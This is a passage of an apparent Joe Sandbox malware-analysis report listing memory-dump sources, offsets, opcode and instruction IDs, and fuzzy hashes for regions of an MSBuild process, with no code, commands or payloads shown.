                                                                                                                                                      • Opcode Fuzzy Hash: 236a1abfde286b4508ebe00a0a38bdf9a532be659e4571e9c40f97aa2ac5f187
                                                                                                                                                      • Instruction Fuzzy Hash: CEF08271168B848FE730C768D408B627F96BB49315F0409EDD58B4BA52D77AEC8AC344
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2116551885.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_3140000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 50b736bf5257db0cbb965daf5032a8fe7b1e07baf019576f7cc77a9e56b64519
                                                                                                                                                      • Instruction ID: bd84769963d6ce5c30d61c31ad85883eb83e996ed1b5cfc25cd7efce7f1631ad
                                                                                                                                                      • Opcode Fuzzy Hash: 50b736bf5257db0cbb965daf5032a8fe7b1e07baf019576f7cc77a9e56b64519
                                                                                                                                                      • Instruction Fuzzy Hash: B6F092706042014FEF3067B6A40C35DBBACDB4D214F5408A6E90AD6241D779D9A08B52
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2150748429.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_6110000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 8aaf699b82157ad462732c75b56c4fa5fd6180e0c094f3f9907aa17fbbb27690
                                                                                                                                                      • Instruction ID: 525c32fa41cac4a37c4812bf1844a08ddf54092923e76a69dc9fc748232c6496
                                                                                                                                                      • Opcode Fuzzy Hash: 8aaf699b82157ad462732c75b56c4fa5fd6180e0c094f3f9907aa17fbbb27690
                                                                                                                                                      • Instruction Fuzzy Hash: A4F05E30D046598FDFA4DFA898057AEBFF4AB04204F0404A9D945D7780E7795615CBC1
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2145821926.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5cc0000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: ae7eba1bd0ef3bc5efdea57176f1592fe471fb372b249ab69b45b5a2dcb5b016
                                                                                                                                                      • Instruction ID: 3669a758e630eae8ccb9b0ae3e9a5bdfd6a5b5ca00b659d7edb90d5a55e5f9fd
                                                                                                                                                      • Opcode Fuzzy Hash: ae7eba1bd0ef3bc5efdea57176f1592fe471fb372b249ab69b45b5a2dcb5b016
                                                                                                                                                      • Instruction Fuzzy Hash: 9DE092363009049BC704AB89E40489ABBAAEF89320B01845AF61A87720CF309D05C7D4
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2145821926.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5cc0000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: fff3cd9e6d3ab18f70bdd0bb98836add2676a2d06d9dc1d868ff0d5cc898ca76
                                                                                                                                                      • Instruction ID: fe05e1cc38eea7ae9640e15f53c46d21909c99a90fee7e84cf06b4bc9a7fa5ef
                                                                                                                                                      • Opcode Fuzzy Hash: fff3cd9e6d3ab18f70bdd0bb98836add2676a2d06d9dc1d868ff0d5cc898ca76
                                                                                                                                                      • Instruction Fuzzy Hash: ECE01235314224CB8A04ABA8B0155ADFB9DE7496627040496F50EC3B40CF665E118BC5
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2150748429.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_6110000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 33fe551f9d0343bb3c084a82f9f7ad8f9554c4fa9be587d5034dae2ead90407c
                                                                                                                                                      • Instruction ID: 65a7cb19372f54c3d7daba871040458e252cce038ba3c59f5abb8bb4eff95a72
                                                                                                                                                      • Opcode Fuzzy Hash: 33fe551f9d0343bb3c084a82f9f7ad8f9554c4fa9be587d5034dae2ead90407c
                                                                                                                                                      • Instruction Fuzzy Hash: ADF0173098161ADFDB649F50C498A6DBB71FF44301F059438D4169B250CB38A882CFC0
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2116551885.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_3140000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: ec060c493813896402554fc7a7e53aca0a6a43abe2e854aae7f2c83e5ddcbbc4
                                                                                                                                                      • Instruction ID: 75770b7de8a224c5ab5c7c908e4596d21b28006346210a5e04a3247fd8d33a2c
                                                                                                                                                      • Opcode Fuzzy Hash: ec060c493813896402554fc7a7e53aca0a6a43abe2e854aae7f2c83e5ddcbbc4
                                                                                                                                                      • Instruction Fuzzy Hash: 32E0EC747402050FEF3066B6A45D32DF79DDB4D214F540C62EA0AE3240EB36E9B04A56
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2116551885.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_3140000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: ba065d1c964a27100711ce9198feb86556624f21f1195818e6577ff0b7d071cd
                                                                                                                                                      • Instruction ID: 1f6cc5b25817c76172c5ea5a2aa472432e9d4e1a62f07c967b9171ed733b4e6d
                                                                                                                                                      • Opcode Fuzzy Hash: ba065d1c964a27100711ce9198feb86556624f21f1195818e6577ff0b7d071cd
                                                                                                                                                      • Instruction Fuzzy Hash: 60E07234A0020A1BDB308ABAEC18328372CEB0A314F2C00BAE802C3780E768C1C08A02
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2116551885.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_3140000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: fd2ed6a93b1a56c87c217606baba3687ec957774cf4ba36745881ef2375069c1
                                                                                                                                                      • Instruction ID: ef2964e5e0f7817dab79f05d808c65f1b86dc7ca94df8bd09fe34d6dc52c1b24
                                                                                                                                                      • Opcode Fuzzy Hash: fd2ed6a93b1a56c87c217606baba3687ec957774cf4ba36745881ef2375069c1
                                                                                                                                                      • Instruction Fuzzy Hash: 9CE06D30505248EFCB01CF78E991688BBB4EF4B300B0044D9D808CB315E6316A15DB92
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2145821926.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5cc0000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: b88cb42452549a7f0aa18d80342da7ed1eabf5595554b5cb3b5e824267705f55
                                                                                                                                                      • Instruction ID: 3ef0c56c5e6ac2ca00ec3a69add6cfe5e3e2c6b7684a81b32a95903130e9b571
                                                                                                                                                      • Opcode Fuzzy Hash: b88cb42452549a7f0aa18d80342da7ed1eabf5595554b5cb3b5e824267705f55
                                                                                                                                                      • Instruction Fuzzy Hash: 5BE08C36700514AB8704AA9AD404C5ABBAAEFC8620304846EF51A8B320CA319C019794
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2145821926.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5cc0000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 8722b4feffd816719713321b9071e1eac1ad0473abbec2aa44135c63d7f73c23
                                                                                                                                                      • Instruction ID: 911d0067303196d38d1d67e9fe7394a4f77ff220bc60f5b223fc82522ec27794
                                                                                                                                                      • Opcode Fuzzy Hash: 8722b4feffd816719713321b9071e1eac1ad0473abbec2aa44135c63d7f73c23
                                                                                                                                                      • Instruction Fuzzy Hash: 00E0C23454A685DFC7125BE0A46F6AD7F70EB04219F640E8FD043C5083CA640E41CB02
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2150748429.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_6110000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 3724aa2bd98a99dd2a1f1b2fea84b5e055742830f82474b11e75ed06b5225eb5
                                                                                                                                                      • Instruction ID: 872a9e9f80b2bbe5b7df742712de03cd03f3c089e349131ba8ef084ec978afcf
                                                                                                                                                      • Opcode Fuzzy Hash: 3724aa2bd98a99dd2a1f1b2fea84b5e055742830f82474b11e75ed06b5225eb5
                                                                                                                                                      • Instruction Fuzzy Hash: CBE0C236A10128DFCF18CFA8E954DDCBBB5EF4D220F1241D5E619A3260C632AD14CB60
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2116551885.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_3140000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 5511dc2289f2a731acea073773d66a0f1b2926b3353dc5eebfe9bd6474cada0f
                                                                                                                                                      • Instruction ID: 9b8f0ba6d70b359def04008cdb201ade7c0989078d7cf1a9352de000daf87f49
                                                                                                                                                      • Opcode Fuzzy Hash: 5511dc2289f2a731acea073773d66a0f1b2926b3353dc5eebfe9bd6474cada0f
                                                                                                                                                      • Instruction Fuzzy Hash: C0D01730A4120CEF8B04DFB8EA5099DB7B9EB88304B1041ADD808D3304FA716F049B81
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2150748429.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_6110000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: e6055294e261fca1dd960a9dc204e5a852193af5f938cc48cd70ac8c387761e1
                                                                                                                                                      • Instruction ID: 980e6ba12090091618a688bce5f1f25455773f02f9fe08c1f262b7723a6e9bcf
                                                                                                                                                      • Opcode Fuzzy Hash: e6055294e261fca1dd960a9dc204e5a852193af5f938cc48cd70ac8c387761e1
                                                                                                                                                      • Instruction Fuzzy Hash: 35D05E763041208BD3049B5CD955B693750EB48719F0144BBE8089B371CE25DD428748
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2150748429.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_6110000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 536d366c42ca62bf046a3850807dd61f2dbf715535cdebadfb57ca5ae35e8d2c
                                                                                                                                                      • Instruction ID: 73f09c3a261dd3d6c00e7e613fbbef5830b1e6c94f3b47463634a6370fe5990e
                                                                                                                                                      • Opcode Fuzzy Hash: 536d366c42ca62bf046a3850807dd61f2dbf715535cdebadfb57ca5ae35e8d2c
                                                                                                                                                      • Instruction Fuzzy Hash: B6C012313002244BC608965CD410D69739D9B89729B0100A6E509CB361CD92EC4147D9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2150748429.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_6110000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 29f85df10581e00d3a7d80f050505ac854f6ae1aa71c8ecd843c1095d3fe12a2
                                                                                                                                                      • Instruction ID: bfcceb2290b9b3ad7296fb4f2427a2119c2e1d8c4cfbf6090f1d55632e1d789f
                                                                                                                                                      • Opcode Fuzzy Hash: 29f85df10581e00d3a7d80f050505ac854f6ae1aa71c8ecd843c1095d3fe12a2
                                                                                                                                                      • Instruction Fuzzy Hash: CEC012313141186B8304D659D41485ABBDD9FC9250310C036E90DC7301DE71DC5387D9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2145821926.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5cc0000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: f77f14f8ecd07a5277a996ffa6142397dce40e30c8b16d2f91873a1fc39bc0a4
                                                                                                                                                      • Instruction ID: 8ee723d68040ff1ff39829dd917a2a57cad890f73836bb6e32748da0699a3bc9
                                                                                                                                                      • Opcode Fuzzy Hash: f77f14f8ecd07a5277a996ffa6142397dce40e30c8b16d2f91873a1fc39bc0a4
                                                                                                                                                      • Instruction Fuzzy Hash: 12D0C9751206098BC6408B44E849A51B7A8BB0C724B0140D5E2444B622CB35A812DB00
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2150748429.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_6110000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 90181a36744f563aefd6a6e2331c260be888a1bb2fc80d742146143fbc9632a2
                                                                                                                                                      • Instruction ID: be560a3d3e4acbb42d20e537ebe01bafaf9e43535c34cd53e49c95468ae928f2
                                                                                                                                                      • Opcode Fuzzy Hash: 90181a36744f563aefd6a6e2331c260be888a1bb2fc80d742146143fbc9632a2
                                                                                                                                                      • Instruction Fuzzy Hash: A0D01276314155DB8B029F95E8549BEBF6DEB882223048067F55AC5041CA368535DB70
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2145821926.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5cc0000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: dac820e63c58a07c4c96c8be29c3bea8ef36b2e161bc49ae39250a01d414fe3a
                                                                                                                                                      • Instruction ID: 966e7bc52870b09c2c8856c333b70e26bcddbe36256d357b137f267c0c891ab9
                                                                                                                                                      • Opcode Fuzzy Hash: dac820e63c58a07c4c96c8be29c3bea8ef36b2e161bc49ae39250a01d414fe3a
                                                                                                                                                      • Instruction Fuzzy Hash: 51D0C97084534ACBEB209FC0C4AF7AFBFB0EB00308F60085DD002A9194CBB80A84CF80
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2150748429.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_6110000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: faaa54344d27eb815b982372f22e519b1723342b11c3590852b8caabfee2d971
                                                                                                                                                      • Instruction ID: 21e96e3489de6c30638525826430b7abef39ea53dfb2e4334001690ad474a2d2
                                                                                                                                                      • Opcode Fuzzy Hash: faaa54344d27eb815b982372f22e519b1723342b11c3590852b8caabfee2d971
                                                                                                                                                      • Instruction Fuzzy Hash: 2AC08C2206C308DFC3002760F41A780BF68E708312F054052B90C81442DB641820C711
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2145821926.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5cc0000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 219e5f4649fec8ffc8e65a30f26d5f9cdd73af2f1043898356b25522dc0f06c2
                                                                                                                                                      • Instruction ID: 1deb801c89d1f91a9d22591982e9095f20597600ec6a078a76569c6a44fdfdfb
                                                                                                                                                      • Opcode Fuzzy Hash: 219e5f4649fec8ffc8e65a30f26d5f9cdd73af2f1043898356b25522dc0f06c2
                                                                                                                                                      • Instruction Fuzzy Hash: 45C048792602088F8240DB59D488C11B3E8AF58A2435180A9E6098B722CB32FC21CA54
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2150748429.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_6110000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 04409384ebbf56b1f324822be318047bffd112dc57efe92e1da003dd195522d8
                                                                                                                                                      • Instruction ID: d17ddd1a9c327f76ef3a29708eb0cbd392f81b839adca9f01f5a8e21242bfe6a
                                                                                                                                                      • Opcode Fuzzy Hash: 04409384ebbf56b1f324822be318047bffd112dc57efe92e1da003dd195522d8
                                                                                                                                                      • Instruction Fuzzy Hash: 78A0123102430CCFC2007750B40D844BB5CA5042127404010B10D804015F2014208641
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2116551885.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_3140000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: \VTm
                                                                                                                                                      • API String ID: 0-628799665
                                                                                                                                                      • Opcode ID: c660baae978bc89223fa82f9745ea5a0418c51c753165cd71af6b3780712f190
                                                                                                                                                      • Instruction ID: 0114040397d2654a5d36e1feacce061f3f4dbc377e018020ab4bff17094194b1
                                                                                                                                                      • Opcode Fuzzy Hash: c660baae978bc89223fa82f9745ea5a0418c51c753165cd71af6b3780712f190
                                                                                                                                                      • Instruction Fuzzy Hash: B9916D70E00209DFDF14CFA9C9957DDBBF2BF88314F188529E405AB294EB349886CB91
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2146982003.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5e10000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 071459d2c4dbb5cd8c5a7c555ff141f1ecd75df254287314fd517a1f7de0cd49
                                                                                                                                                      • Instruction ID: f9ffb9d35ecda2e732ab63a4578908fe60aa9ab2b0ab198a98f69b63849c555b
                                                                                                                                                      • Opcode Fuzzy Hash: 071459d2c4dbb5cd8c5a7c555ff141f1ecd75df254287314fd517a1f7de0cd49
                                                                                                                                                      • Instruction Fuzzy Hash: 97A15C71E002199FDB14DFA9D884AAEFBF6FF88310F148529E919E7350DB349941CB91
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2146982003.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5e10000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 25a480818f58b2078326e6a8414dc7b9b56baa64bb71a200a2d9511b9b6ad080
                                                                                                                                                      • Instruction ID: d75171bf327549cce04c548ae245530c49828c961ad3e88d90f38b459c9cf23f
                                                                                                                                                      • Opcode Fuzzy Hash: 25a480818f58b2078326e6a8414dc7b9b56baa64bb71a200a2d9511b9b6ad080
                                                                                                                                                      • Instruction Fuzzy Hash: 33813A71D002199FEF20CF99C880AEEBBB9FB48314F14946AEC99E7250D734E940CB95